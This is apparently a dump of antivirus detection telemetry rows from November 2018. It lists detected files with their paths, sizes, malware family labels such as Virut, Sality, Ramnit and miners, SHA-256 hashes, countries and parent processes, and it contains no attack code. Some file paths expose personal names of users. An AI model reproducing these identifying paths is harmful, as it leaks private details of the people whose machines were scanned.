  Row(detection=Row(filename='a190_calc.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\A190_Calc.exe', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='04239a5a53d71e87acf2a3ae5873657ccbbbd8fd6e6c39562ccaa8fe2859b7dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:57:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nice bottle', filepath="/Volumes/MAC BU/Backups.backupdb/Daniel's MacBook Pro (2)/2017-06-21-053655/Hard Drive/Users/Danny/Documents/mac book pro/Nice Bottle", filesize=64000, name='W97M/MARKER.HR.#M0.#R0'), hash='0440773f5de89064f083bcd1091c75a8746fcbfbf32e980e265d4974bea36fd8', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:56:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_16_3_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_16_3_4.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='047b368c71a6b2ac7f6a115c49d051a803d4338ca9d501ba4a99ff2915d1c3f1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T09:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner-nofee.exe', filepath='C:\\Users\\X\\Desktop\\zec-miner-nofee_win.0.3.4b\\miner-nofee.exe', filesize=320000, name='HEUR/AGEN.1017423.#M1.#R1'), hash='0487114a1df2852b2f3ba69aaa49930055e04c81ffc1e68dad6b47bec7ba2faa', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:07:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e21560215e4d92257173dc5660252db542a2f6e9', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e21560215e4d92257173dc5660252db542a2f6e9', filesize=2304000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='057bec4b168ee3790125f366ed6c0fd2457087239aea10c60988f3a304155106', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:46:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cdnlink.exe', filepath='\\\\?\\C:\\Program Files (x86)\\CdnApp\\Cdnlink\\Cdnlink.exe', filesize=192000, name='ADWARE/PublishStream.ckypp.#M1.#R1'), hash='059bc6196102546a84fc675ca48cc855ce884e706b05e8e836f96ed92679dd05', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:23:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='i2owb436.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\i2owb436.exe', filesize=128000, name='HEUR/AGEN.1031358.#M1.#R1'), hash='05ef2a5ba87cf6744258137434f14566712d632c88c70e00fa161eb1bd5a7de8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003409.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003409.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='05f89f324857b58ffc3392f104897a2f1f07d4b248b8063ec747ff458e0b6b46', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wordpad.exe', filepath='C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe', filesize=4608000, name='TR/Patched.Gen.#M300.#R5151'), hash='0601ec0cf3b4ce7d3f82163520f8ad07a423fd089363108a90e8746e85d64610', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:45:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wordpad.exe', filepath='C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe', filesize=4608000, name='TR/Patched.Gen.#M300.#R5151'), hash='0601ec0cf3b4ce7d3f82163520f8ad07a423fd089363108a90e8746e85d64610', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:20:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mysqlimport.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Version Cue CS4\\Server\\database-template\\bin\\x86\\mysqlimport.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='0652e2e8370571321214c4aefe78114a203dd646e79e2ec035ffe970e18673d8', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\FTUZMQHB2K\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='06967b05063de0517c283f751c4262fb8e7d30198fdaf1300ff24f0fc5a670b3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:+z5w5T+gzkeY75IQ.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T10:51:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175744-aae63beb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b7bca73\\AVSCAN-20181104-175709-A6DA8255\\AVSCAN-20181104-175744-AAE63BEB', filesize=64000, name='TR/Dropper.Gen.#M1.#R1'), hash='06967b05063de0517c283f751c4262fb8e7d30198fdaf1300ff24f0fc5a670b3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:57:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='my_print_defaults.exe', filepath='\\Device\\HarddiskVolume65\\DATEN\\SAGE\\Sage New Classic\\MySQL 560\\bin\\my_print_defaults.exe', filesize=6016000, name='TR/Patched.Gen.#M300.#R3374'), hash='06a58d5ca253248793b55e8312663de4ad0c5cf527692cf9867f5895dd72f110', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\wbengine.exe', parentsize=None, timestamp='2018-11-04T20:20:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scvhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:58:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scvhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:01:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134134-bf4891d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab7724b5\\AVSCAN-20181104-134121-BD1A7C06\\AVSCAN-20181104-134134-BF4891D3', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='071b6238e972219e9521a64908ada6143b97ac1e83b9439930dc9901c9ae82be', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:37:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T09:37:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T19:02:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:20:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:35:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:16:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:46:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:32:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:26:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142925-0029bcbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5964c17\\AVSCAN-20181104-141526-5A93CEC8\\AVSCAN-20181104-142925-0029BCBC', filesize=3712000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='078e9a6ae1ed2b2ef178f7bbb12a0a04ba629e1fce6313436d1b806df237491c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:29:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142621-dbcc99bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5964c17\\AVSCAN-20181104-141526-5A93CEC8\\AVSCAN-20181104-142621-DBCC99BC', filesize=3712000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='078e9a6ae1ed2b2ef178f7bbb12a0a04ba629e1fce6313436d1b806df237491c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155046-b47ed510', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db22258a\\AVSCAN-20181104-152714-31398C24\\AVSCAN-20181104-155046-B47ED510', filesize=3712000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='078e9a6ae1ed2b2ef178f7bbb12a0a04ba629e1fce6313436d1b806df237491c', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='опись документов 1.1.exe', filepath='F:\\Проф\\Опись документов 1.1.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='07c5a52329e42aa99f7582672622be8164b4605129da966a4279eac849e0c54c', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='опись документов 1.1.exe', filepath='\\\\?\\F:\\Проф\\Опись документов 1.1.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='07c5a52329e42aa99f7582672622be8164b4605129da966a4279eac849e0c54c', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:36:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:36:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:36:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152125-aac2a527', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_436779a9\\AVSCAN-20181104-151638-82CFE55F\\AVSCAN-20181104-152125-AAC2A527', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='08a1a6e9c26d1e8abdc8d0b30128bae529a6373b8a6b1bb45557a5dc0369dd7c', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:21:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152003-9f6b14b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_436779a9\\AVSCAN-20181104-151638-82CFE55F\\AVSCAN-20181104-152003-9F6B14B1', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='08a1a6e9c26d1e8abdc8d0b30128bae529a6373b8a6b1bb45557a5dc0369dd7c', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_17_10_1.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_17_10_1.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='08d164ebfdbcc78ab2c200eb4891cf0db7544613c808f469e32641cd689e99ae', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194618-4ef15205', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77abea06\\AVSCAN-20181104-194023-17C93266\\AVSCAN-20181104-194618-4EF15205', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:46:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194712-5744279f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77abea06\\AVSCAN-20181104-194023-17C93266\\AVSCAN-20181104-194712-5744279F', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:47:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194149-2532070c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77abea06\\AVSCAN-20181104-194023-17C93266\\AVSCAN-20181104-194149-2532070C', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-164950-23da8af7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d37b11d1\\AVSCAN-20181103-164922-1EB2D974\\AVSCAN-20181103-164950-23DA8AF7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:49:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrardll.dll', filepath='C:\\KMPlayer\\unrarDLL.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='09f43eb71fb2e60a8097c22d16a03eaad057fb86b118d5ebc373d7463990f566', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T02:48:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avjebmi.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\avjebmi.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0a11464c7e25c439e48278628a11ddcb6252c622e70ffa1ec4ba74e198e4c5c0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:59:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avjebmi.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\avjebmi.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0a11464c7e25c439e48278628a11ddcb6252c622e70ffa1ec4ba74e198e4c5c0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:59:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avjebmi.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\avjebmi.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0a11464c7e25c439e48278628a11ddcb6252c622e70ffa1ec4ba74e198e4c5c0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:11:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ileabdr.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ileabdr.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0ac45a35416b98986da19fbfe9542725de6640c87b34ba80ba68873a7bdde409', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ileabdr.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ileabdr.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0ac45a35416b98986da19fbfe9542725de6640c87b34ba80ba68873a7bdde409', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ileabdr.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ileabdr.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0ac45a35416b98986da19fbfe9542725de6640c87b34ba80ba68873a7bdde409', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7001fec3fedc9a3625b2d72107d85c8686f29fa3', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\7001fec3fedc9a3625b2d72107d85c8686f29fa3', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='0adcd7f228fcc08807fbd8c0abb1db554e91e15f3c6e1171ae3a24a02b920d05', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:16:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='0bf06d0a2669a9df10f2d9f9dcd0e08fccd6661c848d90ceb286305bb4f175df', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T21:30:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxa7155.tmp', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxa7154.tmp\\dxa7155.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:16:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214012-e28bc3b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-214012-E28BC3B6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:39:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151124-2bce84a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5abbdeb8\\AVSCAN-20181104-151032-24159DF7\\AVSCAN-20181104-151124-2BCE84A5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151124-2bce84a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5abbdeb8\\AVSCAN-20181104-151032-24159DF7\\AVSCAN-20181104-151124-2BCE84A5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:28Z'), dt=datetime.date(2018, 11, 4)),
